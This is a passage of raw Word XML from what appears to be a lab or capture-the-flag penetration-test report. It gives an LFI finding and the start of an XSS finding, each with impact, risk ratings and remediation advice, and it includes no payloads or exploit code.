          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2408EF0D" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="0063656F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Lecture Slides</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FA25C4" w14:textId="77777777" w:rsidR="009C624B" w:rsidRDefault="009C624B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57C3A9C6" w14:textId="56C8402E" w:rsidR="009C624B" w:rsidRDefault="009C624B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Workshops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BF6224B" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="6C8E5E33" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0CB41" w14:textId="31EBA0B5" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc131032155"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Finding 2 </w:t>
      </w:r>
      <w:r w:rsidR="003F5898">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidR="003F5898">
        <w:t>LFI and Information Disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4258D9" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>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75"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B42F8" w14:paraId="2D2F5219" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B576DAD" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="17" w:name="_ecusln6fz5kp" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="18" w:name="_Toc131032156"/>
            <w:bookmarkEnd w:id="17"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="18"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="24174E9B" w14:textId="525B7352" w:rsidR="009B42F8" w:rsidRDefault="003F5898">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The website’s LFI vulnerability poses a high risk of unauthorized access to sensitive files and data stored on the server. This can also result in severe information leakage, which may bring potential financial loss.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="65A96D41" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B6D4EFE" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="19" w:name="_t8incernf7a4" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="20" w:name="_Toc131032157"/>
            <w:bookmarkEnd w:id="19"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="20"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B7C2BCE" w14:textId="31DC0EA9" w:rsidR="009713C1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:hyperlink w:anchor="_Appendix_2_-" w:history="1">
              <w:r w:rsidR="003F5898" w:rsidRPr="002837A8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>See Appendix Section II &amp; IV.</w:t>
              </w:r>
              <w:r w:rsidR="009713C1" w:rsidRPr="002837A8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve"> (2 flags)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="22B2BE45" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2FD1345A" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="21" w:name="_fn0axcalhlkf" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="22" w:name="_Toc131032158"/>
            <w:bookmarkEnd w:id="21"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="22"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="07D21D17" w14:textId="7937FA90" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="003F5898">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ttacker can exploit this vulnerability to gain access or control critical system files, configuration files or sensitive data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="6B1A0B9A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E3A1869" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="23" w:name="_lc3yc0anp3bq" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="24" w:name="_Toc131032159"/>
            <w:bookmarkEnd w:id="23"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Ratings</w:t>
            </w:r>
            <w:bookmarkEnd w:id="24"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55C74896" w14:textId="3073CC4C" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57082DC2" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009713C1" w:rsidP="003F5898">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Some files c</w:t>
            </w:r>
            <w:r w:rsidR="003F5898">
              <w:t>an be</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> leaked</w:t>
            </w:r>
            <w:r w:rsidR="003F5898">
              <w:t xml:space="preserve"> without </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>authentication</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="79E976C2" w14:textId="77777777" w:rsidR="009713C1" w:rsidRDefault="009713C1" w:rsidP="003F5898">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">May lead to sensitive information </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>disclosure</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="59389787" w14:textId="12291BF7" w:rsidR="009713C1" w:rsidRDefault="009713C1" w:rsidP="009713C1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>May lead to other attacks such as code injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="44A9660A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="613C12EC" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="25" w:name="_akb5porhgj0n" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="26" w:name="_Toc131032160"/>
            <w:bookmarkEnd w:id="25"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="26"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5FB33F35" w14:textId="77F98C29" w:rsidR="009B42F8" w:rsidRDefault="00A440DD" w:rsidP="009713C1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Input validation and sanitisation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508C4964" w14:textId="00A86C5D" w:rsidR="00A440DD" w:rsidRDefault="00A440DD" w:rsidP="009713C1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Apply access controls</w:t>
            </w:r>
            <w:r w:rsidR="00C80541">
              <w:t xml:space="preserve"> to restrict user access to sensitive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C80541">
              <w:t>files</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5C0002AF" w14:textId="440A7D25" w:rsidR="009352A1" w:rsidRDefault="009352A1" w:rsidP="009713C1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Use pre-configured and verified file paths</w:t>
            </w:r>
            <w:r w:rsidR="00C80541">
              <w:t xml:space="preserve"> instead of including files from the local file systems using user </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C80541">
              <w:t>inputs</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="322136F0" w14:textId="3953F26D" w:rsidR="009352A1" w:rsidRDefault="009352A1" w:rsidP="009352A1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Re-architect software to have stricter </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>rules</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="648803B5" w14:textId="771DA0B3" w:rsidR="009352A1" w:rsidRDefault="009352A1" w:rsidP="009352A1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Do not leave sensitive information in codes</w:t>
            </w:r>
            <w:r w:rsidR="00C80541">
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C80541">
              <w:t>comments</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="58AECADD" w14:textId="421EB432" w:rsidR="00A440DD" w:rsidRDefault="00A440DD" w:rsidP="009713C1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="50AACE77" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2625" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31BC5ABC" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="27" w:name="_2rsjak33pos9" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="28" w:name="_Toc131032161"/>
            <w:bookmarkEnd w:id="27"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:bookmarkEnd w:id="28"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21F1B49E" w14:textId="36113651" w:rsidR="009B42F8" w:rsidRDefault="00ED7F69">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Lecture Slides</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43BF867E" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="259772C1" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A2DEE" w14:textId="18CF97C9" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc131032162"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Finding 3 </w:t>
      </w:r>
      <w:r w:rsidR="003F5898">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidR="003F5898">
        <w:t>XSS in User Profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60D8CF" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>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9B42F8" w14:paraId="0289E9F1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="576A2C67" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="30" w:name="_Toc131032163"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="30"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F3655E5" w14:textId="3E865C65" w:rsidR="009B42F8" w:rsidRDefault="00064647">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The User Profile page</w:t>
            </w:r>
            <w:r w:rsidR="0010335B">
              <w:t xml:space="preserve"> has some blocks available for user inputs which</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0010335B">
              <w:t>are</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> vulnerable to XSS attack</w:t>
            </w:r>
            <w:r w:rsidR="0010335B">
              <w:t>. This</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> allows attackers to inject malicious scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="2A3B4294" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7FE07B6B" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="31" w:name="_Toc131032164"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="31"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="61EBB2E7" w14:textId="67D5360E" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:hyperlink w:anchor="_Appendix_2_-" w:history="1">
              <w:r w:rsidR="00394AE3" w:rsidRPr="002837A8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>See Appendix II Section III. (1 flag)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="6B2BAD33" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E75E881" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="32" w:name="_Toc131032165"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="32"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C65744E" w14:textId="1CFD1B6A" w:rsidR="009B42F8" w:rsidRDefault="0010335B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">An attacker can exploit XSS to execute JavaScript in user’s browser to steal cookies, DOM, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>LocalStorage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>, etc. AJAX calls can also be performed to send requests, pretending to be the user.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="5E4D1687" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05A067B4" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="33" w:name="_Toc131032166"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Ratings</w:t>
            </w:r>
            <w:bookmarkEnd w:id="33"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="75B726B3" w14:textId="7B4CDBD2" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1544E2" w14:textId="5294EA63" w:rsidR="00A634C1" w:rsidRDefault="00A634C1" w:rsidP="0010335B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Malicious scripts can be </w:t>
            </w:r>
